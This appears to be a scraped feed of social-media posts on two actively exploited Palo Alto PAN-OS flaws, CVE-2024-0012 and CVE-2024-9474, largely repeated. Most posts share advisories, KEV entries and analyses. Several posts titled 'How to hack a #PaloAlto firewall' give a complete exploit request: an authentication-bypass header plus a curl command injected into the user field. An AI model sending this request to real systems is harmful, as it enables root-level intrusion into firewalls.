##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
###PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ #cybersecurity #Infosec
##New Episode: ISC StormCast for Wednesday, November 20th, 2024
Shownotes:
Detecting the Presence of a Debugger in Linux
https://isc.sans.edu/diary/Detecting%20the%20Presence%20of%20a%20Debugger%20in%20Linux/31450
Palo Alto Patches
https://security.paloaltonetworks.com/CVE-2024-0012
https://security.paloalt
AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans
Or Listen right here.
##Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.
1) CVE-2024-0012 has been assigned
2) Indicators of Compromise has been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions has been updated
5) Fixed versions has been updated.
Refer: https://patchnow24x7.com/blog-1/f/pan-sa-2024-0015-secure-your-paloalto-management-interface-now
#PatchNOW
#Vulnerability
#ComputerSecurity
#hacked
#Cyberattack
#infosec
#informationsecurity
#CyberSecurityAwareness
#DataBreach
#cybersecurity
r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
###PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ #cybersecurity #Infosec
##Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.
1) CVE-2024-0012 has been assigned
2) Indicators of Compromise has been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions has been updated
5) Fixed versions has been updated.
Refer: https://patchnow24x7.com/blog-1/f/pan-sa-2024-0015-secure-your-paloalto-management-interface-now
#PatchNOW
#Vulnerability
#ComputerSecurity
#hacked
#Cyberattack
#infosec
#informationsecurity
#CyberSecurityAwareness
#DataBreach
#cybersecurity
r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!
##Favorite quote from WatchTowr's blog about PAN-OS vuln:
##I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.
Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.
A few things stand out:
First, sorry @cR0w, no #directorytraversalmemes for you:
We simply… supply the
off
value to theX-PAN-AUTHCHECK
HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.
That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING
return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
So obviously if that $username
has shell metacharacters, you have yourself a nice command injection.
And guess what user the service runs as?
##WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ #cybersecurity #infosec #PaloAlto
##If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek https://www.securityweek.com/palo-alto-patches-firewall-zero-day-exploited-in-operation-lunar-peek/ @SecurityWeek @ekovacs
More:
Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##@christopherkunz Palo Alto keeps on giving.
##Curious about CVE-2024-0012 - PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The overall sighting gives a good timeline of activities concerning the vulnerability.
🔗 https://vulnerability.circl.lu/vuln/CVE-2024-0012#sightings
#infosec #opensource #cybersecurity #vulnerability #paloalto
##Weeeeeee
I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
##CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog
: CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).
🔗️ [Cyble] https://link.is.it/so5jib
##The way Palo Alto Networks has handled information disclosure regarding CVE-2024-0012 has been terrible 😬
##@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would be allow for the other.
So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).
Unit 42 skipped talking about CVE-2024-9474.
The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall
##@shadowserver IOCs provided by Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
CVEs were added to CISA's KEV Catalog: https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog
###CISA has updated the KEV catalogue:
CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1212
- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-0012
- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-9474 @cisacyber #cybersecurity #infosec #PaloAlto
##CVE ID: CVE-2024-0012
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Notes: https://security.paloaltonetworks.com/CVE-2024-0012 ; https://nvd.nist.gov/vuln/detail/CVE-2024-0012
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-0012
#PaloAlto has updated its security advisories: https://security.paloaltonetworks.com/
- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface https://security.paloaltonetworks.com/CVE-2024-0012
- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec
##Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/ #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE
##Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.
CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
##@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
##Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/ @unit42_intel #cybersecurity #infosec
##@neurovagrant start your Monday off with exploited zero-days:
##@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474
##Huh. So PAN apparently released sigs to cover a critical vuln in the PAN-OS web management interface. Could this finally be it? They list it as CVE-2024-0012 and link to the advisory.
Well, the link is broken, but maybe it's just not published yet: https://security.paloaltonetworks.com/CVE-2024-0012
Let's take a look at that CVE on cve.org: https://www.cve.org/CVERecord?id=CVE-2024-0012
Oh, still says reserved. Maybe they meant their own advisory number of PAN-SA-2024-0012: https://security.paloaltonetworks.com/PAN-SA-2024-0012
No, that doesn't make sense. That's about a bunch of OSS CVEs that are not even confirmed to be impacting PAN-OS.
So here we are once again with PAN using lots of words to say nothing. *sigh*
I need more coffee.
##updated 2024-11-19T17:16:40.513000
51 posts
1 repos
How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
##Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited https://thecyberexpress.com/palo-alto-pan-os-two-bugs-under-exploitation/ #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
#CVE_2024_0012 #CVE_2024_9474
https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
##watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.
#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity
##CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##Unit 42: Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.
h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares
#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC
##Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)
The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474
Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.
New Indicators of compromise at Unit 42: https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC
